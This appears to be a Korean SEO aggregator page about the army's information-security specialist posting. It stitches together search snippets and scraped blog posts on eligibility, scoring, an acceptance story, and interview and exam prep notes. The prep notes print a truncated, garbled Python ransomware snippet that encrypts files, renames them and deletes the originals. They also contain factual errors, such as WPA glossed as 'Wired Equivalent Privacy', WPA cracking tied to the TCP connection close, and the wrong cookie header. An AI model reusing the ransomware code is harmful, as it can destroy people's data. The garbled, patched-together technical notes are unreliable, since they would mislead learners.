정보 보호 병 | 컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병) 1761 좋은 평가 이 답변

당신은 주제를 찾고 있습니까 “정보 보호 병 – 컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병)“? 다음 카테고리의 웹사이트 ppa.maxfit.vn 에서 귀하의 모든 질문에 답변해 드립니다: https://ppa.maxfit.vn/blog/. 바로 아래에서 답을 찾을 수 있습니다. 작성자 코딩하는거니 이(가) 작성한 기사에는 조회수 29,840회 및 좋아요 448개 개의 좋아요가 있습니다.

정보 보호 병 주제에 대한 동영상 보기

여기에서 이 주제에 대한 비디오를 시청하십시오. 주의 깊게 살펴보고 읽고 있는 내용에 대한 피드백을 제공하세요!

d여기에서 컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병) – 정보 보호 병 주제에 대한 세부정보를 참조하세요

#정보보호병 #소프트웨어개발병 #컴퓨터공학 #군대

정보 보호 병 주제에 대한 자세한 내용은 여기를 참조하세요.

정보보호병 – 나무위키:대문

연령. 지원서 접수년도 기준 18세 이상 28세 이하 (2021년 기준 : 1993.1.1. ~ 03.12.31. 출생자) ; 기본요건. 징병신체검사 결과 신체등위 1급~4급자로서 …

+ 여기에 표시

Source: namu.wiki

Date Published: 7/2/2022

View: 6810

육군 정보보호병에 대해 알아보자! (2020년)

정보보호병은 육군본부, 군단급, 전방의 일부사단에서 컴퓨터 정보보호관련 임무를 수행합니다. 쉽게 말해서, 군대에서의 컴퓨터 바이러스나 해킹 등 …

+ 여기에 자세히 보기

Source: steady-coding.tistory.com

Date Published: 5/17/2022

View: 8705

육군 정보보호병 후기 – velog

육군 정보보호병에 지원해서 합격하게 되었습니다!저는 한림대학교 소프트웨어융합대학에 재학중이며 정보보안이나 해킹과는 거리가 좀 있는 사람 …

+ 자세한 내용은 여기를 클릭하십시오

Source: velog.io

Date Published: 10/25/2021

View: 3796

2021.04.01 육군 정보보호병 지원 1차 – filime

작년 기준으로 내 점수를 매기면 40점으로 간당간당하게 합격할 수 있는 커트라인이다. 그래서 이제는 한 30~32점 이상은 되어야 합격 커트라고 볼 수 …

+ 여기에 더 보기

Source: filime.tistory.com

Date Published: 10/16/2021

View: 7173

‘정보보안 기타/정보보호병 후기’ 카테고리의 글 목록

2021.10.18일자로 공군 정보보호병 면접을 보고 왔습니다. 관련 학과인 건양대학교 사이버보안공학과를 재학중이라서 전공 관련 추가점수를 받았으며, …

+ 여기에 자세히 보기

Source: majeulsa.tistory.com

Date Published: 5/18/2022

View: 3825

ETC/정보보호병 – BLOG

[INFORMATION GUARD] 정보보호병 1차 합격 정보보호병 1차 합격하기까지 필자가 계획하던 군입대는 1학년 마치고 바로이다.

+ 여기에 더 보기

Source: alltime-it.tistory.com

Date Published: 9/21/2021

View: 5448

정보보호병 – IT특기병으로 취업까지 두마리 토끼잡기

정보보호병은 육군본부, 군단급, 전방의 일부사단에서 단말 정보보호 지원, 인포콘(INFOCON) 훈련지원, 정보보호 체계 관제 및 관리 등의 임무를 수행 …

+ 여기에 자세히 보기

Source: it.itbank.ne.kr

Date Published: 7/30/2021

View: 3908

2021년 기준 육군 정보보호병에 대해 – 생각중

우선 정보보호병은 육군 기준으로 전문특기병으로 분류되어 만기 전역 시, 전역증과 함께 군 경력 증명서를 발급할 수 있다. 복무기간 1년 6개월 중, …

+ 여기에 표시

Source: hoadeongja.tistory.com

Date Published: 9/28/2022

View: 3171

주제와 관련된 이미지 정보 보호 병

주제와 관련된 더 많은 사진을 참조하십시오 컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병). 댓글에서 더 많은 관련 이미지를 보거나 필요한 경우 더 많은 관련 기사를 볼 수 있습니다.

컴공은 꼭 군대를 여기로 가세요... (Feat. 정보보호병 / 소프트웨어개발병)
컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병)

주제에 대한 기사 평가 정보 보호 병

  • Author: 코딩하는거니
  • Views: 조회수 29,840회
  • Likes: 좋아요 448개
  • Date Published: 2019. 12. 3.
  • Video Url link: https://www.youtube.com/watch?v=wTaug1FfFrk

육군 정보보호병에 대해 알아보자! (2020년)

안녕하세요? 코딩중독입니다.

이번 시간에는 육군 정보보호병이 무엇이고, 지원 자격과 선발 과정 등에 대해 설명하려고 합니다.

군대.. 남자라면 피할 수 없는 숙명과도 같은 꽤나 듣기 싫은 단어죠.

그리고 흔히 군필 분들이 군대를 갔다오면, 그전에 공부했던 내용이 기억나지 않는 일명 ‘리셋’ 현상을 겪는다고 합니다.

그래서 웬만하면 면제나 공익을 받는 것이 베스트겠지만, 현역이 된 이상 최대한 본인의 전공을 살려서 군 입대를 가는 것이 좋습니다.

막상 전공을 살려서 군대를 가자고 결심했지만, 어떻게 살려야하는지 고민이 되실 겁니다.

그래서 제가 이 포스팅을 통해서 정보를 드리고자 합니다.

제목에서 알 수 있듯이, 육군은 주로 정보보호병과 SW개발병을 많이 지원합니다.

이번 글에서는 정보보호병에 대해 알아보려고 합니다.

그렇다면, 정보보호병이 하는 일은 뭘까요?

정보보호병이 하는 일

정보보호병은 육군본부, 군단급, 전방의 일부사단에서 컴퓨터 정보보호관련 임무를 수행합니다. 쉽게 말해서, 군대에서의 컴퓨터 바이러스나 해킹 등을 예방하는 정보보호 업무를 하는 것입니다.

지원 자격

지원 조건은 길어보이지만, 간단합니다.

신체 검사에서 현역 판정을 받았고, 정보보호나 컴퓨터공학 관련 학과에 나오거나, 정보보호 및 정보처리 관련 자격증을 소유하고 있으면 됩니다.

위의 제한 대상에도 해당하지 않고, 필수 요건을 갖추었다면 누구나 지원할 수 있습니다.

이제, 선발 과정 및 배점을 보도록 합시다.

선발 및 평가 배점

선발은 1차와 2차가 있는데, 1차에서는 서류 검사를 통해서 2배수 인원을 뽑으며, 2차에서는 면접 평가를 진행한 후 최종 합격자를 발표합니다.

그리고 서류와 면접 비율이 70:30으로, 면접 비율이 생각보다 높다는 점에 유의하셔야 합니다.

이제, 선발 세부 배점을 봅시다.

정보보호 계열이 배점이 더 높고, 컴퓨터 공학 계열은 조금 점수가 낮다는 것을 알 수 있습니다.

그리고 학력과 대학교를 몇 년 수료하였는지도 배점에 큰 영향을 미치기 때문에 주로 사람들이 대학교 2학년을 마치고 정보보호병에 지원한다고 합니다.

고등학교 출석률 또한 확인합니다.

아마, 고등학생 때 착실하게 학교를 다니셨다면, 위에 배점은 다들 만점을 받으실 겁니다.

이 부분은 아마 대부분 해당이 안 되지 않을까 싶습니다.

하지만, 만약 회사에서 근무하시다가 정보보호병에 지원하는 것이면 꽤 소소한 보너스 점수가 됩니다.

아무 대회에 입상한다고 점수를 주는 것은 아니고, 위의 3가지 조건 중 하나에 해당하는 대회에서 입상해야 합니다.

하지만….. 대회에 입상하는 일이 쉽지 않을 일이기 때문에 이 부분도 배점을 받아가는 사람은 적을 것으로 예상됩니다.

동아리는 특히 BOB 출신이면 고득점을 받을 수 있는데, BOB는 워낙에 들어가기 쉽지 않기 때문에 동아리는 필수적으로 하는 것이 좋습니다.

KISA 추천 동아리가 아니더라도 2점은 받아갈 수 있으니, 동아리 활동을 반드시 하셔야 합니다.

참고로, 본인이 속한 동아리가 KISA 추천 동아리인지 확인하려면 아래 사이트에 들어가시면 됩니다.

마지막으로 자격증입니다.

여기는 자격증이 있는 것과 없는 것 차이가 꽤 크기 때문에 정보보호병이든 다른 전문특기병이든 지원하시려면 반드시 자격증을 취득하셔야 합니다!!

저는 개인적으로 다른 해군이나 공군과도 겹치는 정보처리기능사 자격증을 따는 것을 추천드립니다.

배점이 16점으로 20점이나 18점에 비해서는 낮지만, 난이도가 쉬워서 크게 오래 걸리지가 않습니다.

18점에 속하는 인터넷보안전문가나 해킹보안전문가 자격증도 알아 보았으나, 아무래도 민간 자격증이라서 사람들이 거의 응시하지 않기 때문에 관련 자료가 거의 없었고, 응시료도 매우 매우 비싸서 비추합니다.

여기까지가 1차 선발에 해당하는 평가 배점이었습니다.

다음으로, 2차 선발 평가 배점에 대해 보겠습니다.

지원동기, 면접태도, 대인관계역량, 표현력, 직무능력으로 총 5개 영역을 평가하는데, ‘직무능력’이 가장 배점이 크고 중요합니다.

앞의 4개 항목은 충분히 정보보호병에 대해 알아보고, 기본적인 면접 질문 대비를 열심히 하셨다면 만점에 가까운 점수를 받으실 수 있습니다.

하지만, 직무능력은 직접 관련 공부를 열심히 해야 하고, 면접 외에 추가로 필기 시험을 보는 것으로 알고 있습니다.

따라서, 필기 시험도 준비하고 직무능력 면접에 대비하기 위해서는 ‘정보보안기사 필기’를 준비하는 것이 좋습니다.

정리

배점을 받는 방식이 다양한만큼 정보보호병에 안정적으로 합격하기 위해서는 일찍 준비하는 것이 좋습니다.

일반 동아리만 해도 최소 1년은 활동해야 2점을 받을 수 있고, 평소에 정보보호 관련해서 관심을 갖고 있어야 직무능력을 대비하기 좋을 듯합니다.

정보보호병에 대한 이야기는 이만 줄이고, 다음 시간에는 육군 SW개발병에 대해 알아 보도록 하겠습니다.

육군 정보보호병 후기

육군 정보보호병에 지원해서 합격하게 되었습니다!

저는 소프트웨어융합대학에 재학중이며 정보보안이나 해킹과는 거리가 좀 있는 사람인데도 어느정도 상식을 쌓으니 합격시켜주었네요.

관련 지식은 네트워크관리사 2급이랑 정보처리기능사를 취득하며 어느정도 접해봤고, 그 외 문제를 좀 풀어보며 익히려고 노력했습니다.

합격 수기를 간단히 적어볼까 합니다.

과정

서류심사 (1차) 필기시험 (2차) 면접 (2차)

위와 같은 점수로 합격을 했습니다.

1차지원 같은 경우는 서류심사를 통해서 뽑고 2차는 대전충남지방병무청에 가서 필기시험과 면접 후에 최종 결과를 통보받을수 있었습니다.

서류에 관해서는 제가 딱히 드릴 말씀이 없습니다. 병무청 홈페이지에 들어가보시면 몇몇 자격증이 가선점을 주는데 저같은 경우는 동급 추가점수인 네트워크관리사나 정보처리기능사에 가산점이 붙고 다니는 학과에 추가점수를 받아 서류 34점으로 무난히 합격했습니다.

필기시험하고 면접을 준비한다고 상당히 애먹었는데 만약 정보보호병을 준비하시는 분들이 제 글을 본다면 조금 더 수월하게 준비할 수 있지 않을까 싶습니다.

필기 준비

필기는 무조건 정보보안기사 기출 풀어봐야 합니다.

보안기사에서 모든 문제가 다나옵니다.

기수가 틀려지면 모르겠지만 저같은 경우는 시험지에 10문제가 나왔고, 모두 보안 기사에서 한번씩은 본 문제들이여서 풀 수 있었습니다.

제가 보안기사 보면서 본 사이트 참조해드릴테니 다 보는건 현실적으로 무리가 있고 200문제 내지 300문제만 눈으로 훑어도 큰 도움이 되리라 확신합니다.

1~14회 보안기사 기출문제

다른 문제집 볼 필요 없이 계속 저것만 훑어보세요. 필기문제는 정말 저기서 갈라집니다.

평균적인 합격점수로 추론해봤을때 3~4문제 정도 맞추면 얼추 커트라인 이상으로 무난히 통과가 가능한 것 같습니다.

면접 준비

면접을 제가 참 고민을 많이 했습니다.

인터넷에 올라온 후기같은걸 보면 막 해킹기법 워터링 홀이 뭐냐, 브루트포스 어택을 아냐 이런씩으로 물어보시던데 이걸 그럼 다 외워가야하냐 생각이 막막했습니다.

면접은 총 두번에 걸쳐서 보는데, 한분은 군무원인거 같았고 한분은 대위이신것 같더라고요.

군무원 분은 만약 그룹간의 마찰이 생기면 어떻게 대처할 것인가, 또는 밤샘 근무할 일이 많을텐데 어떻게 대처할 것인가 이런 형식적인 질문을 하셨고 다수결에 따라서 어떻게 어떻게 할 것이다 라고 에둘러 대답하니 어찌저찌 넘어간 것 같습니다.

개인적인 생각으론 면접후에 핵심적인 질문은 대위님이 많이 하신 것 같았습니다.

대위님도 평범한 질문을 꽤 하셨는데, 그외에 제가 좀 핵심적으로 느낀 걸 꼽자면

로그를 아냐 아는 정보보안 장비가 있냐

이정도였습니다.

저는 막 복잡한 해킹기법 이야기하실줄 알고 준비를 꽤 많이 해갔는데 아쉽더라고요.

여기서 정말 임팩트있게 느낀건 아는 보안장비가 있냐는 질문이 나왔을 때 IPS랑 IDS를 말씀드리니 정말 눈이 틀려진 것 같았습니다. 간략히 설명하니 만족하셨던 것 같구요.

면접전에 공부한 이런 전문적인 지식을 내포하는게 핵심 포인트인 것 같습니다.

아래에 제가 면접 대비하며 정리해놓은 파일 기재할테니 참고하시면 좋을꺼같아요.

해킹 기법 정리

1.Syn/Ack Flood

코드출처: Normaltic

◉ client ack (클라이언트 데이터 보내기전 동기화 요청) ->server syn/ack(서버응답) -> client ack(클라이언트 응답)

◉ TCP접속을 성공시키기 위해 반드시 필요한 과정 – > 3way handshaking

◉ ack(응답)을 안보내니까 syn이 꽉차서 syn 백로그큐를 폭주시켜서 dinial of service 가 발생함

◉ FIN Flag를 이용한 4way handshaking 또한 존재

대응책

1.백로그큐 크기 늘림

2.신 쿠키 설정

3.방화벽에 임계치 설정

4.tcp 연결 과정 대기시간 줄임

DDOS 대응방안

◉ DOS공격이 맞는지 명확히 판단

◉ 형 파악 후 차단정책 근거 확보

◉ 차단정책 설정

◉ 공격대비/정책업데이트/좀비PC IP확보

◉ 막는법은 없고 서버 증설하거나 해당 ip를 서버에서 차단시킴 /서버 ip바꾸기/클라우드플레어

◉ 윈도우에서 iis(internet information service)에서 ip및 도메인 차단 들어가서 막기 시전

◉ 리눅스에서 root # route add -host [IP] reject

2.SQL Injection

Sql 질의문을 삽입하는 공격

◉ 정상 로그인

◉ 해커가 입력한 로그인

◉ where 절에서 and 조건은 or조건보다 선행되기 때문에 무조건 true값 리턴, 모든 데이터 출력되버림

◉ 대충 아이디 ~(SQL 질의문 추가)

◉ 정상적인 질의쿼리: select * from user where id=’[사용자ID]’

◉ 인젝션당한쿼리: select * from user where id=’[사용자ID]’~~~임의의 sql 구문

◉ blind/mass/union 등 다양한 변화형태 존재 blind->참거짓 리턴

◉ WAS(웹애플리케이션 서버) -> database

예: sql : {} 하나 사와

{} 빵

{} 빵 하나 사오고 건물 한채 계약해

DB에 임의의 SQL명령 실행(쉘까지 확보 가능)

DB의 데이터를 추출

인증 우회

DB 데이터 변조

◉ 악성 파일 업로드 가능 막는법: 쿼리와 관련된 코드를 죄다 필터링시켜서 시큐어 코딩

3.XSS Cross Site Scripting

진짜 간단히 말해서 이거.

대부분은 막아두지 근데 정말 보안 아예 안해둔 사이트는 안막아둠

보통은 이런씩으로 링크를 걸어서 알림창을 뜨게함

아스키코드로 위 실행명령을 변환시킨 뒤에 일부 웹서버는 필터링을 제대로 안해주므로 잘 통하는 경우가 있음

허점 즉, 취약점을 찾는 것이 중요함

워낙 변칙적이고 다 막기가 힘들어서 위험함

자바스크립트 형식으로 버튼/함수 응용가능

방지법

1.태그 써서 막기

2.필터링 등등..

xss 응용기법

◉ 칼리리눅스에서 xss를 응용한 BeEF 컨트롤 패널 등 사용가능

(browser exploitation framework project)

◉ 여기에 pretty theft 같은 기법이 있음( 홈페이지 똑같이 구현해서 가짜 홈페이지에 치게하고 로그따오는거)

4.RansomWare

import glob import os , random , struct from Cryptodome . Cipher import AES def encrypt_file ( key , in_filename , out_filename = None , chunksize = 64 * 1024 ) : if not out_filename : out_filename = in_filename + ‘.yankee’ iv = os . urandom ( 16 ) encryptor = AES . new ( key , AES . MODE_CBC , iv ) filesize = os . path . getsize ( in_filename ) with open ( in_filename , ‘rb’ ) as infile : with open ( out_filename , ‘wb’ ) as outfile : outfile . write ( struct . pack ( ‘ ‘ + filename ) encrypt_file ( key , filename ) os . remove ( filename ) for filename in glob . iglob ( startPath , recursive = True ) : if ( os . path . isfile ( filename ) ) : fname , ext = os . path . splitext ( filename ) if ( ext == ‘.enc’ ) : print ( ‘Decrypting> ‘ + filename ) decrypt_file ( key , filename ) os . remove ( filename )

5.WPA Crack

◉ 앞서 3 way handshake 가 세션을 연결하는 과정이었다면, 4 way handshake는 클라와 서버의 연결을 끊고 세션을 종료하는 과정임. 이 과정에서 해킹이 가능함

그 과정은 이러합니다.

◉ Fin wait -> close wait-> fin wait 2

◉ 여기서 time wait을 주는 이유는 Routing 지연이나 패킷 유실로 인한 재전송 등으로 인해 FIN패킷보다 늦게 도착하는 상황이 발생할 수 있기 때문

◉WPA란?

Wired Equivalent Privacy의 약자로 유선랜에 상당하는 Privacy를 제공하기 위한 알고리즘

◉ WEP를 보완하는 암호화 방식

WPA Version1, Vesion2가 있음

◉ 여기서 사용된 Aircrack-ng는 디텍터, 패킷 스니퍼, WEP와 [Wi-Fi Protected Aooo ccess|WPA]/WPA2-PSK 802.11 무선 LAN에 대한 크래커와 분석 도구가 탑재된 네트워크 소프트웨어이다.

IPS란?

침입 차단 시스템(侵入遮斷 – ,영어:Intrusion Prevention Systems (IPS), Intrusion Detection and Prevention Systems (IDPS)) 또는침입 방지 시스템은 외부네트워크로부터 내부 네트워크로 침입하는 네트워크패킷을 찾아 제어하는 기능을 가진소프트웨어또는하드웨어이다.

IBM Proventia, 윈스 Sniper IPS, Cisco 파이어파워, 티핑포인트 등

IDS란?

침입 탐지 시스템(Intrusion Detection System, IDS)은 일반적으로 시스템에 대한 원치 않는 조작을 탐지하여 준다. IDS는 매우 많은 종류들이 존재하며, 여기서는 그들 중 일부를 설명한다. 시스템에 대한 원치 않는 조작은 악의를 가진 숙련된해커또는 자동화된 툴을 사용하는스크립트 키디에 의한 공격의 형태로 행해질 수 있다

스노트나 브로같은게 ids 예

문제

클라이언트에서 서버로 쿠키를 보낼 때 사용하는 HTTP 헤더는?

-> set-cookie와 cookie 등의 선지가 있었다.

set-cookie, 중간에 개인정보 탈취등을 방지하기 위해 세션등이 사용됨 다음 중 전자상거래와 관련이 없는 것은?-> ebXML, SET, SSL, EMV가 선지였다.

ssl은 인터넷 데이터 암호화 기술 chmod 명령어의 특징이 아닌 것은?-> 파일과 디렉토리를 rename할 수 있다는 선지를 선택했다. HTTP 오류 코드와 그 뜻을 알맞게 짝지은 것이 아닌 것은?

-> 200, 403, 404, 500이 나왔다. 다음 중 입력값에 대한 검증 / 특수문자 처리를 하지 않은 것과 무관한 공격 기법은?

-> injection 기법 두세 종류와 ‘watering hole’이 나왔다. ‘watering hole’을 골랐다. watering hole : 워터링 홀 공격이란 공격대상이 자주 방문하는 홈페이지를 사전에 악성코드에 감염시킨 뒤 공격대상이 접속 할 때까지 잠복하면서 기다린다. 그리고 공격대상이 접속하면 비로서 공격을 시도하는 수법이다. 홈페이지에 접속하는 모든 사용자를 공격하기 때문에 접속하는 모든 사용자가 공격의 대상이 될 수 있다

◉ xss크로스사이트스크립트, 스크립트엔진 취약점과도 연관있음

리눅스 방화벽에서 ping에 대한 응답으로 ‘destination unreachable’을 리턴하기 위해 설정해야 하는 플래그는?

-> DENY, REJECT 등이 있었다. REJECT를 골랐다. 다음 화면은 어떤 명령어의 실행 결과인가? (ping 실행 화면)

-> 답이 ping이다 ㅋㅋ 다음 중 IPS에 대한 설명으로 올바르지 않은 것은? (그냥 IPS가 아니라 어플리케이션 뭐시기 IPS이었는데 기억이 안난다) 침해 단계의 심각성?에 따라 나열할 때, 빈칸에 들어갈 단어들은? (emergency에서 debug까지 나열되어 있었다.)

-> alert, info 등이 있었는데, 그냥 영어 할 줄만 알면 나열 가능하다

◉ 사고 전 준비 과정]→[사고 탐지]→[초기 대응]→[대응 전략 체계화]→[사고 조사]→[보고서 작성]→[해결]

침입이 있는데, 없다고 판단하는 경우는 뭐라고 하는가? (True/False Positive/Negative 중 선택)-> False Negative라고 답했는데, 맞을지 모르겠다.

◉ 1번

전자서명과 관련없는 프로토콜을 고르시오.

1. DSA

2. KCDSA

3. ECDSA

4. A5/3

=> 답 : 4

dsa가 digital signature algorithm 이므로 dsa붙은거 고르면된다.

◉ 2번

DB 보안으로서 적절하지 못한 자세는? (문제설명이 똑같지는 않지만 취지는 동일하다.)

1. 관리자를 최소한으로 만든다.

2. 로컬 계정으로 접속하는 것을 금지

3. Guest 계정으로 접속하는 것을 금지

4. 기억 안나는데 답은 아니였음

=> 답 : 2

​로컬 계정으로 접속하는게 안되면 뭐 다 안되지

◉ 3번

SIEM에서 사용되는 프로토콜로 적절하지 못한 것은?

1. Qrader

2. Arcsight

3. SPLUNK

4. beStorm

=> 답 : 4 (정답은 기억 안나는데 나머지 보기는 틀린 보기임)

​siem = sim(보안정보관리) + sem(보안이벤트관리)

◉ 4번

공개키와 대칭키 알고리즘을 사용하여 키교환을 하는 방식에서 제 3자가 해당 공개키를 인증할 수 있는 시스템은?

(문제설명이 똑같지는 않지만 취지는 동일하다.)

1. 키 분배 인증 센터

2. RSA ->공개키 암호시스템

3. Diffie Hellman

4. 기억 안남

=> 답 : 1

◉ 5번 문제 기억 안남

◉ 6번

파일 시스템 내에서 파일이나 디렉토리의 고유한 번호, 블록 정보 등이 담겨있는 파일은?

1. boot

2. data

3. i-node

4. 기억 안남

=> 답 : 3

◉ 7번

멀티 쓰레드나 멀티 프로세스에서 공유 자원을 여러 실행흐름이 접근하여 발생될 수 있는 취약점은?

1. buffer overflow 메모리 취약점 ->스택””은 해당버퍼에 할당된거보다 많이쓸때

2. Return to Library 라이브러리 함수 리턴

3. Race Condition ->상호배제,진행,한정대기

4. SQL Injection

=> 답 : 3

◉ 8번

웹 로그 파일에 기록되는 보기로 알맞지 않은 것을 고르시오.

1. IP 주소

2. 접속 시 Method

3. 접속 시 프로토콜

4. 접속 시 포트번호

=> 답 : 3 (정답이 정확하지는 않음 필자는 3번으로 적음)

◉ 9번

IDS가 수행되는 절차를 알맞게 배열한 보기를 고르시오.

=> 답 : [데이터 수집 -> 가공 -> 분석 -> 보고]

◉ 10번

TCP에서 4way HandShake의 연결 종료 과정에서 Seq와 ACK의 번호로 ㄱ, ㄴ, ㄷ, ㄹ에 알맞는 번호가 들어간 것을 고르시오.

=> 이 문제는 연결 종료 과정을 보여주면서 빈칸 기호와 번호가 일치하는 보기를 고르는 문제임. 답은 기억 안남

◉ strcpy 대신 strncpy를 사용하는 이유버퍼 오버플로우/scanf,getbyhostname등도 여기속함

◉ NMS가 확인할 수 없는 것호스트의 CPU 점유율

◉ 윈도우 공유 폴더 취약점(Null SessionIPC$

◉ TCP에서 클라이언트의 버퍼 오버플로우를 막기 위한 것흐름 제어

◉ crontab과 관련된 문제

◉ 사용자 인증 관련 문제최대 권한

◉ 다음 로그는 어떤 공격인가?랜드 공격(Land Attack)

◉ 디지털 포렌식에서 우선적으로 분석해야 하는 것레지스터

웹 대상으로 이루어지는 공격 시도를 막는 것웹 방화벽(WAF)

◉ 1. 파일 업로드 취약점을 묻는 문제 (단답식)

공격자는 서버 사이드 스크립트(PHP, JSP, .NET 등)을 이용하여 웹쉘(WebShell)을 제작

웹쉘(WebShell)은 원격에서 웹 서버를 제어하기 위한 목적으로 만들어졌으나, 지금은 웹쉘 = 악성코드라고 분류를 하여 안티 바이러스에서 탐지함

sql injection 과 다른점: 웹에서 노출되는 정보들을 하나씩 가져오는 sql injection 과 달리 파일 업로드 취약점은 웹쉘을 통해 시스템에 아예 침투하고 난 뒤 원하는 데이터들을 마음껏 가져오는 것

시큐어 코딩 – 소스코드 레벨 대응

◉ 2. 해시함수를 묻는 문제 (단답식)

임의의 길이를 갖는 임의의 데이터를 고정된 길이의 데이터로 매핑하는 함수를 말한다.

◉ 3. 메시지 인증코드를 묻는 문제 (단답식)

메시지 인증 코드(Message Authentication Code, 약칭 MAC)는메시지의 인증에 쓰이는 작은 크기의정보이다. MAC알고리즘은비밀 키를 입력받고, 임의-길이의 메시지를 인증한다.

◉ 4. 포맷 스트링 취약점을 묻는 문제 (답답식)

◉ 5. 운영체제 프로세스 상태 관련 문제 – 임계상태, 교착상태, 상호베재 등등 (객관식)

◉ 6. 포렌식 이미지 생성 프로그램을 묻는 문제 – nc, gz, tar, encase (객관식)

◉ 7. 로그 파일을 피해자 메일에 자동으로 전송하는 공격 프로그램을 묻는 문제 – 답 모름 ㅠㅠ (단답식)

◉ 8. VPN을 묻는 문제 (단답식)

◉ 9. OSI 7계층의 계층 중 설명에 대한 계층은 어느 계층인지 묻는 문제 (단답식)

면접준비

◉ CVE란 무엇입니까?

CVE(Common Vulnerabilities and Exposure)는 공개적으로 알려진 소프트웨어의 보안취약점을 가리키는 고유 표기를 뜻한

◉ APT 공격이 무엇입니까?

APT공격은 해커가 다양한 보안 위협을 만들어 특정 기업이나 조직의 네트워크에 지속적으로 가하는공격을 뜻한

◉ Zeroday공격이 무엇입니까?

제로 데이공격(또는 제로 데이 위협,Zero-DayAttack)은 컴퓨터 소프트웨어의 취약점을공격하는 기술적 위협으로, 해당 취약점에 대한 패치가 나오지 않은 시점에서 이루어지는공격을 말한다.

◉ 워러 크라이란 무엇입니까?

워너크라이(WannaCry) 또는워너크립트(WannaCrypt)[2],WanaCrypt0r 2.0는 2017년 5월 12일부터 등장한랜섬웨어멀웨어 툴이다. 2017년 5월 12일부터 대규모사이버 공격을 통해 널리 배포되었으며, 전세계 99개국의 컴퓨터 12만대 이상을 감염시켰다.[3][4]감염된 컴퓨터로는 20개의 언어로비트코인을 지급하면 풀어주겠다는 메시지를 띄웠다.

킬스위치 찾아냈고,방화벽이랑 인터넷 랜선꼽을때 유의하면 사전예방 가능

◉ 랜섬웨어란 무엇입니까?

랜섬웨어란 Ransom(몸값)과 Ware(제품)의 합성어로서 악성코드의 일종입니다. 해당 악성코드에 감염시컴퓨터 시스템에 접근이 제한되거나저장된 문서나 사진․동영상 파일이 암호화되어 사용할 수 없게 되며, 해커는 이에 대한 해제 대가로 금품을 요구합니다.

최근 이스라엘 보안 기업 만든 스파이웨어 페가수스가 애플뚫음

브루트 포스(무차별 대입 공격) 언급하며 그걸로도 몇백년 걸리는걸 뚫은게 대단하다고 생각함

기타 자료

TCP의 4-way Handshaking 과정

[STEP 1]

클라이언트가 연결을 종료하겠다는 FIN플래그를 전송한다. 이때A클라이언트는 FIN-WAIT상태가 된다.

[STEP 2]

B서버는 FIN플래그를 받고, 일단 확인메시지 ACK 보내고 자신의 통신이 끝날때까지 기다리는데 이 상태가

B서버의 CLOSE_WAIT상태다.

[STEP 3]

연결을 종료할 준비가 되면, 연결해지를 위한 준비가 되었음을 알리기 위해 클라이언트에게 FIN플래그를 전송한다. 이때 B서버의 상태는 LAST-ACK이다.

[STEP 4]

클라이언트는 해지준비가 되었다는 ACK를 확인했다는 메시지를 보낸다.

A클라이언트의 상태가 FIN-WAIT ->TIME-WAIT 으로 변경된다.

그런데 만약 “Server에서 FIN을 전송하기 전에 전송한 패킷이 Routing 지연이나 패킷 유실로 인한 재전송 등으로 인해 FIN패킷보다 늦게 도착하는 상황”이 발생한다면 어떻게 될까요?

Client에서 세션을 종료시킨 후 뒤늦게 도착하는 패킷이 있다면 이 패킷은 Drop되고 데이터는 유실될 것입니다.

A클라이언트는 이러한 현상에 대비하여 Client는 Server로부터 FIN을 수신하더라도 일정시간(디폴트 240초) 동안 세션을 남겨놓고 잉여 패킷을 기다리는 과정을 거치게 되는데이 과정을”TIME_WAIT”라고 합니다. 일정시간이 지나면, 세션을 만료하고 연결을 종료시키며,”CLOSE”상태로 변화합니다.

방화벽과 ips/ids 차이

ips/ids 차이

◉ 패킷

패킷의 구성요소

1) 헤더(Header)동기 신호 플래그, 전송지 주소, 목적지 주소, 순차 번호 등패킷에는 프로토콜의 다양한 정보들이 헤더에 기록되는데, 프로토콜에 따라 다름.

2) 데이터(Data)데이터 부분에는 실제로 전송될 내용이 있음.

3) 트레일러(Trailer)수신 측에서는 전송 중에 데이터가 손상되었는지 알 수 있음.

예) 전송 에러 검사 항목 CRC(Cyclic Redundancy Check)

OSI 7계층

Ids 침입탐지유형

◉ NIDS (네트워크 침입 감지 시스템)

◉ 호스트 침입 탐지 시스템 (HIDS)

SQL과 Blind SQL의 차이는?

◉ Sql인젝션은 쿼리를 삽입해 원하는 데이터를 한번에 얻어냄

◉ Blind sql인젝션은 쿼리가 참일때와 거짓일때의 반응으로만 데이터를 알아냄

Setuid가 뭔가요

◉ 리눅스 특수권한 중 하나로 루트유저 엑세스 파일에 일반유저가 접근하게끔 허가

◉ 8진수 4000이 비트

◉ Setgid는 8진수 2000

◉ 커널에 내장된 툴로써 패킷 필터링, connection tracking

iptables

john the ripper

브루트포스

리눅스 설정 파일/ 임시파일/ 물리적 장치

etc/tmp/dev

퍼온 정보도 많습니다

혹시 원작자이시거나 불편하신 점이 있다면 댓글에 적어주세요

정보보호병이 나름 정예병이나, SW개발병에 비하면 나름 문턱도 작고 준비만 열심히 한다면 충분히 시도해 볼만한 보직인 것 같습니다.

필자도 보안에 관련해서는 모르는 부분이 정말 많지만, 적당한 공부를 통해 합격할 수 있었네요.

아직 훈련소도 들어가보지 못했고 사령부에 배치받을지 사단급에 배치받을지도 모르지만,

아무런 생각없이 군생활 하는 것보다 특기를 살려서 하는 편이 훨씬 낫다는 확신이 듭니다.

겁내지 말고 도전해보면 뭐라도 주는것 같아요 ㅋㅋ

앞으로 정보보호병을 하며 얻게된 경험이나 일 또한 기밀을 제외하고 기재할 기회가 있길 바랍니다.

2021.04.01 육군 정보보호병 지원 1차

2021.04.01 세종대학교 정보보호학과 2학년 1학기 재학 중에 평생 과제를 해결하고 싶어 정보보호병으로 지원했다.

서류 점수

점수 분배는 이렇게 되어있고 내가 사전 조사해본 결과 작년에는 면접이 30점이었지만 올해는 40점으로 비중이 매우 커졌다.

정보보호학과나 정보보안, 해킹 방어와 같이 보안과 직접 관련된 과는 1순위이고 컴퓨터공학과나 전자공학 같이 관련 학과는 2순위 나머지는 비전공으로 분류된다.

나는 1순위이고 2년 재학 중이니 14점을 먹고 간다.

고교 출석률은 0일이므로 10점을 먹고 간다.

